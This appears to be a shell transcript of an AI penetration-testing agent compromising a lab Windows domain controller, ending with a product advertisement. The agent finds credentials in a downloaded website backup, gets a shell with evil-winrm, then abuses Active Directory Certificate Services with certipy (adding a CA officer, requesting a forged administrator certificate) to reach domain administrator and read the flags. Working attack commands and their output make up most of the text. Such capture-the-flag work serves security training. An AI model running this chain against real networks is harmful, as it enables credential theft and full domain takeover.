Devices 2 0 Windows Security 2 0 Windows Sidebar 2 0 WindowsApps 2 0 WindowsPowerShell 2 0 Program Files (x86) 1 0 Common Files 2 0 Internet Explorer 2 0 Microsoft SQL Server 2 0 Microsoft.NET 2 0 Uninstall Information 2 0 Windows Defender 2 0 Windows Mail 2 0 Windows Media Player 2 0 Windows Multimedia Platform 2 0 windows nt 2 0 Windows Photo Viewer 2 0 Windows Portable Devices 2 0 Windows Sidebar 2 0 WindowsPowerShell 2 0 ProgramData 1 0 Application Data 2 0 Desktop 2 0 Documents 2 0 Microsoft 2 0 Package Cache 2 0 regid.1991-06.com.microsoft 2 0 SoftwareDistribution 2 0 ssh 2 0 Start Menu 2 0 Templates 2 0 USOPrivate 2 0 USOShared 2 0 VMware 2 0 Recovery 1 0 ReAgentOld.xml 2 1 SQL2019 1 0 System Volume Information 1 0 Users 1 0 Administrator 2 0 All Users 2 0 Default 2 0 Default User 2 0 Public 2 0 [REDACTED] 2 0 Windows 1 0 ADFS 2 0 ADWS 2 0 appcompat 2 0 apppatch 2 0 AppReadiness 2 0 assembly 2 0 bcastdvr 2 0 bfsvc.exe 2 1 Boot 2 0 Branding 2 0 CbsTemp 2 0 certenroll.log 2 1 certocm.log 2 1 Containers 2 0 CSC 2 0 Cursors 2 0 debug 2 0 DfsrAdmin.exe 2 1 DfsrAdmin.exe.config 2 1 diagnostics 2 0 DigitalLocker 2 0 Downloaded Program Files 2 0 drivers 2 0 DtcInstall.log 2 1 ELAMBKUP 2 0 en-US 2 0 explorer.exe 2 1 Fonts 2 0 Globalization 2 0 Help 2 0 HelpPane.exe 2 1 hh.exe 2 1 IdentityCRL 2 0 iis.log 2 1 IME 2 0 ImmersiveControlPanel 2 0 INF 2 0 InputMethod 2 0 Installer 2 0 L2Schemas 2 0 LiveKernelReports 2 0 Logs 2 0 lsasetup.log 2 1 media 2 0 mib.bin 2 1 Microsoft.NET 2 0 Migration 2 0 ModemLogs 2 0 notepad.exe 2 1 NTDS 2 0 OCR 2 0 Offline Web Pages 2 0 Panther 2 0 Performance 2 0 PFRO.log 2 1 PLA 2 0 PolicyDefinitions 2 0 Prefetch 2 0 PrintDialog 2 0 Provisioning 2 0 regedit.exe 2 1 Registration 2 0 RemotePackages 2 0 rescache 2 0 Resources 2 0 SchCache 2 0 schemas 2 0 security 2 0 ServerStandard.xml 2 1 ServerStandardEval.xml 2 1 ServiceProfiles 2 0 ServiceState 2 0 servicing 2 0 Setup 2 0 ShellComponents 2 0 ShellExperiences 2 0 SKB 2 0 SoftwareDistribution 2 0 Speech 2 0 SpeechOneCore 2 0 splwow64.exe 2 1 System 2 0 system.ini 2 1 System32 2 0 SystemApps 2 0 SystemResources 2 0 SystemTemp 2 0 SYSVOL 2 0 SysWOW64 2 0 TAPI 2 0 Tasks 2 0 Temp 2 0 TextInput 2 0 tracing 2 0 twain32 2 0 twain32.dll 2 1 Vss 2 0 WaaS 2 0 Web 2 0 win.ini 2 1 WindowsShell.Manifest 2 1 WindowsUpdate.log 2 1 winhlp32.exe 2 1 WinSxS 2 0 WMSysPr9.prx 2 1 write.exe 2 1 SQL ([REDACTED]\[REDACTED] guest@master) exit shell:~$ # Found web.config and website backup zip file in wwwroot - let's download the backup file which might contain credentials or sensitive information shell:~$ wget http://10.129.209.100/website-backup-27-07-23-old.zip --2025-08-01 01:22:20-- http://10.129.209.100/website-backup-27-07-23-old.zip Connecting to 10.129.209.100:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1045328 (1021K) [application/x-zip-compressed] Saving to: ‘website-backup-27-07-23-old.zip’ website-backup-27-0 100%[===================] 1021K 1.77MB/s in 0.6s 2025-08-01 01:22:20 (1.77 MB/s) - ‘website-backup-27-07-23-old.zip’ saved [1045328/1045328] shell:~$ # Successfully downloaded the website backup zip file - let's extract and examine its contents for potential credentials or sensitive information shell:~$ unzip website-backup-27-07-23-old.zip Archive: website-backup-27-07-23-old.zip inflating: .old-conf.xml inflating: about.html inflating: contact.html inflating: css/bootstrap.css inflating: css/responsive.css inflating: css/style.css inflating: css/style.css.map inflating: css/style.scss inflating: images/about-img.png inflating: images/bodybg.jpg extracting: images/call.png extracting: images/call-o.png inflating: images/client.jpg inflating: images/contact-img.jpg extracting: images/envelope.png extracting: images/envelope-o.png inflating: images/hero-bg.jpg extracting: images/location.png extracting: images/location-o.png extracting: images/logo.png inflating: images/menu.png extracting: images/next.png extracting: images/next-white.png inflating: images/offer-img.jpg

dc01.[REDACTED] 389 0 dc=[REDACTED],dc=[REDACTED] microsoft

cn=[REDACTED],CN=users,dc=[REDACTED],dc=[REDACTED]

shell:~$ # Found credentials for [REDACTED] user! Let's test WinRM access since [REDACTED] is in Remote Management Users group shell:~$ netexec winrm [REDACTED] -u [REDACTED] -p '[REDACTED]' WINRM 10.129.209.100 5985 DC01 [] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:[REDACTED]) WINRM 10.129.209.100 5985 DC01 [+] [REDACTED]\[REDACTED]:[REDACTED] shell:~$ # Great! [REDACTED] credentials work for WinRM access. Let's connect and get initial foothold shell:~$ evil-winrm -i [REDACTED] -u [REDACTED] -p '[REDACTED]' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quotingdetectionproc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint Evil-WinRM PS C:\Users\[REDACTED]\Documents whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled Evil-WinRM PS C:\Users\[REDACTED]\Documents # Successfully gained WinRM access as [REDACTED]! Let's get the user flag and then enumerate for privilege escalation Evil-WinRM PS C:\Users\[REDACTED]\Documents type C:\Users\[REDACTED]\Desktop\user.txt d8cf629367b67e3d60bd49dae6ce6358 Evil-WinRM PS C:\Users\[REDACTED]\Documents Killed shell:~$ # Successfully gained user access with [REDACTED] credentials! Let's continue with privilege escalation enumeration shell:~$ evil-winrm -i [REDACTED] -u [REDACTED] -p '[REDACTED]' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quotingdetectionproc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint Evil-WinRM PS C:\Users\[REDACTED]\Documents whoami [REDACTED]\[REDACTED] Evil-WinRM PS C:\Users\[REDACTED]\Documents Killed shell:~$ # The user wants you to pivot the assessment, starting with the instruction below. shell:~$ # investigate ADCS shell:~$ # The user wants me to investigate Active Directory Certificate Services (ADCS). Let's use certipy to enumerate certificate templates and vulnerabilities shell:~$ certipy find -u '[REDACTED]@[REDACTED]' -p '[REDACTED]' -dc-ip 10.129.209.100 /opt/venv/lib/python3.13/site-packages/certipy/version.py:1: UserWarning: pkgresources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkgresources.html. The pkgresources package is slated for removal as early as 2025-1 1-30. Refrain from using this package or pin to Setuptools

shell:~$ certipy ca -ca '[REDACTED]-DC01-CA' -add-officer [REDACTED] -username '[REDACTED]@[REDACTED]' -password '[REDACTED]' -dc-ip 10.129.209.100 /opt/venv/lib/python3.13/site-packages/certipy/version.py:1: UserWarning: pkgresources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkgresources.html. The pkgresources package is slated for removal as early as 2025-1 1-30. Refrain from using this package or pin to Setuptools /dev/null shell:~$ # Try using the certificate with netexec pass-the-certificate functionality shell:~$ netexec smb 10.129.209.100 -u administrator --pfx administrator.pfx netexec smb: error: ambiguous option: --pfx could match --pfx-cert, --pfx-base64, --pfx-pass shell:~$ # Try using netexec with the correct certificate option shell:~$ netexec smb 10.129.209.100 -u administrator --pfx-cert administrator.pfx -d [REDACTED] SMB 10.129.209.100 445 DC01 [] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:[REDACTED]) (signing:True) (SMBv1:False) SMB 10.129.209.100 445 DC01 [-] Error Name: KRBAPERRSKEW Detail: "The clock skew is too great" shell:~$ # Check if we can request a new certificate for the domain controller machine account using our CA permissions shell:~$ certipy req -username '[REDACTED]@[REDACTED]' -password '[REDACTED]' -ca '[REDACTED]-DC01-CA' -target 10.129.209.100 -template 'Machine' -upn 'dc01$@[REDACTED]' /opt/venv/lib/python3.13/site-packages/certipy/version.py:1: UserWarning: pkgresources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkgresources.html. The pkgresources package is slated for removal as early as 2025-1 1-30. Refrain from using this package or pin to Setuptools

shell:~$ certipy auth -pfx administrator.pfx -dc-ip 10.129.209.100 -username administrator -domain [REDACTED] /opt/venv/lib/python3.13/site-packages/certipy/version.py:1: UserWarning: pkgresources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkgresources.html. The pkgresources package is slated for removal as early as 2025-1 1-30. Refrain from using this package or pin to Setuptools type C:\Users\Administrator\Desktop\root.txt 62a2a12c66ad095459f159f99d5bbd63 Evil-WinRM PS C:\Users\Administrator\Documents

Want to try it? Email us at contact@vulnetic.ai.